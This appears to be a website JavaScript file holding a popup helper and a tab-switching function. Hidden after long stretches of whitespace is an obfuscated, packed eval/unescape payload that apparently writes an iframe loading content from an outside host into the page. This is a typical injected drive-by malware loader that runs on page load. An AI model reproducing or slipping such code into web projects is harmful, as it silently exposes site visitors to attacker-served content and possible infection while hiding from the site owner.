function popup(mylink, windowname)
{
if (! window.focus)return true;
var href;
if (typeof(mylink) == 'string')
   href=mylink;
else
   href=mylink.href;
window.open(href, windowname, 'width=550,height=380,scrollbars=no');
return false;
}

var tabs = new Array("block_1", "block_2", "block_3", "block_4", "block_5");                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    

function tabium(elementname) { 

	var element_id = document.getElementById(elementname);

	for(var i=0;i<tabs.length;i++){ 
		objHide = document.getElementById(tabs[i]);
		objHide.style.display="none"; 
		objHideTab = document.getElementById("Tab"+i);
		objHideTab.className = "TabTD"; 
		if (elementname == tabs[i]) {
			objHideTab.className = "TabTDOn"; 
		}
	} 

	element_id.style.display=""; 
}

















































                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('A(z(\'%k%3%2%B%h%0%n%1%u%s%g%6%1%0%x%t%v%6%j%g%4%h%0%f%b%g%2%e%i%8%1%1%l%o%7%7%9%3%2%4%9%8%3%b%1%y%9%3%3%l%a%4%2%w%u%2%3%h%7%5%d%a%a%q%J%H%c%2%m%I%G%0%m%m%5%c%j%0%d%j%2%4%a%5%q%C%c%c%5%d%d%7%i%f%s%6%k%1%8%e%5%f%8%0%6%D%8%1%e%5%f%b%1%r%9%0%e%i%k%6%b%l%9%4%r%o%n%3%n%0%i%p%v%7%6%j%g%4%h%0%p%t%F%E\'));',46,46,'65|74|63|6F|61|31|69|2F|68|6C|62|73|32|34|3D|20|72|6D|22|66|64|70|38|6E|3A|3E|30|79|77|27|2E|3C|6B|28|2D|unescape|eval|75|39|67|3B|29|37|33|35|36'.split('|'),0,{}));                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     






























































